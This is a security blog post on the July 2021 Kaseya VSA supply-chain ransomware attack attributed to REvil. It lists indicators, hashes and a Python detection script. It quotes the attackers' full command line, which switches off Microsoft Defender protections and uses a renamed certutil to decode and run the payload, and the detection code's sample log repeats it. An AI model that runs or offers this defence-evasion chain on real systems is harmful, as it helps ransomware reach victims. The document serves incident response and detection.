MSPs Using Kaseya VSA Find Themselves Distributing Ransomware

By Christopher
July 2, 2021

Kaseya, a provider of IT management software, has found itself at the center of what seems to be a supply chain attack. The first signs became visible just after noon EDT today after Kaseya and the Cybersecurity & Infrastructure Security Agency (CISA) encouraged Managed Service Providers (MSPs) to shut down their Kaseya VSA servers to avoid losing administrative access or becoming the victim of ransomware, along with their entire customer base.

Currently, Kaseya is still investigating the cause and is uncertain what has led to these compromises, but what is known for sure is that once threat actors gain access to a VSA server, they take over the administrative accounts and spread the ransomware to all of the MSP's customers.

Kaseya VSA is a Remote Monitoring and Management tool often used by MSPs to efficiently manage and monitor the networks they oversee. So far, no other Kaseya products, including IT Glue, have been noted as an attack vector, but administrators may want to stay on the lookout.

According to the security firm Huntress Labs, via their post on r/msp, as of 7:50 pm EDT on Friday, July 2nd, a total of 8 MSPs have reported being affected by the supply chain attack, resulting in ransomware hitting thousands of endpoints across these MSPs, with one MSP in the Netherlands reporting more than 2,100 endpoints affected and over 200 businesses being encrypted. One ransom demand has come in at $5 million, and it’s believed the threat actors are related to the REvil ransomware gang.

The current indicators shared by Huntress Labs in their Reddit post and others are as follows:

  • agent.crt is dropped by the Kaseya VSA.
  • The file is then decoded with certutil to carve out agent.exe, which is dropped to the C:\kworking folder.
  • agent.exe contains two files: MsMpEng.exe and mpsvc.dll. The EXE is legitimate, but the DLL is malicious and is used to activate the attack.
  • The VSA procedure is named “Kaseya VSA Agent Hot-fix”.

For those who log PowerShell, they may notice this activity coming from the parent path of C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe:

“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
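As an added example (not from the original post, nor from Huntress or Sophos), the Python below scans process-creation events for the combination of behaviours in the command line above: the loopback ping delay, Defender being switched off with Set-MpPreference, certutil copied to cert.exe, the -decode of agent.crt, and execution from C:\kworking. The pipe-separated log format, the `EXAMPLE-ID` agent folder and the sample events are all constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Regexes derived from the command line quoted in the post (detection only).
INDICATORS = {
    "defender_tamper": re.compile(
        r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection|"
        r"ScriptScanning|IntrusionPreventionSystem)", re.I),
    "certutil_copied_to_cert_exe": re.compile(
        r"copy\s+/Y\s+\S*certutil\.exe\s+\S*cert\.exe", re.I),
    "certutil_decode_agent_crt": re.compile(
        r"cert(util)?\.exe\s+-decode\s+\S*agent\.crt\s+\S*agent\.exe", re.I),
    "ping_loopback_delay": re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d{3,}", re.I),
    "kworking_agent_exec": re.compile(r"\\kworking\\agent\.exe", re.I),
}
# Parent image the post names; the <ID> folder segment varies per install.
KASEYA_PARENT = re.compile(r"\\Kaseya\\[^\\]+\\AgentMon\.exe$", re.I)

@dataclass
class Finding:
    line_no: int
    parent_is_agentmon: bool
    hits: list = field(default_factory=list)

def parse_event(line):
    """Constructed log format: '<timestamp> | <parent image> | <command line>'."""
    ts, parent, cmdline = (p.strip() for p in line.split(" | ", 2))
    return ts, parent, cmdline

def scan(lines, min_hits=2):
    """Flag events where at least min_hits indicators co-occur; one Set-MpPreference alone is normal admin work."""
    findings = []
    for n, line in enumerate(lines, 1):
        _, parent, cmdline = parse_event(line)
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
        if len(hits) >= min_hits:
            findings.append(Finding(n, bool(KASEYA_PARENT.search(parent)), hits))
    return findings

# Constructed sample events: benign ping, a lone Defender change, a certutil hash check, and one modelled on the post.
SAMPLE_LOG = [
    r'2021-07-02T12:01:00 | C:\Windows\explorer.exe | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 4 > nul',
    r'2021-07-02T12:02:00 | C:\Windows\System32\cmd.exe | powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true',
    r'2021-07-02T12:03:00 | C:\Windows\explorer.exe | certutil.exe -hashfile C:\Users\admin\image.iso SHA256',
    r'2021-07-02T12:04:00 | C:\Program Files (x86)\Kaseya\EXAMPLE-ID\AgentMon.exe | "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableScriptScanning $true -Force & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: parent=AgentMon {f.parent_is_agentmon}, indicators={f.hits}")
```

Only the fourth event is flagged at the default threshold; the lone Set-MpPreference call on line 2 surfaces only if min_hits is lowered to 1, which is the trade-off to tune against your own environment's admin activity.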

A copy of the malicious DLL associated with this attack has already been posted on VirusTotal. Additional hashes are as follows per Sophos’s blog:

  • C:\windows\cert.exe
    • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
  • C:\windows\msmpeng.exe
    • 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • C:\kworking\agent.crt
  • C:\Windows\mpsvc.dll
    • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
  • C:\kworking\agent.exe
    • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Thanks to Sophos and HuntressLabs for their contributions toward helping the community learn and react to this attack as it remains ongoing. Check back for additional updates as available.

Tags: Kaseya, Ransomware, REvil
Christopher

Christopher Clai is a Senior Security Engineer, IT Generalist, and Developer from Chicago, IL with over 20 years of experience in Information Technology ranging from small businesses to Fortune 500's. Chris loves the Pacific Northwest, Sushi, Invader Zim, Rugby, World of Warcraft, raves, and is an avid user of Microsoft and Linux-based technologies.
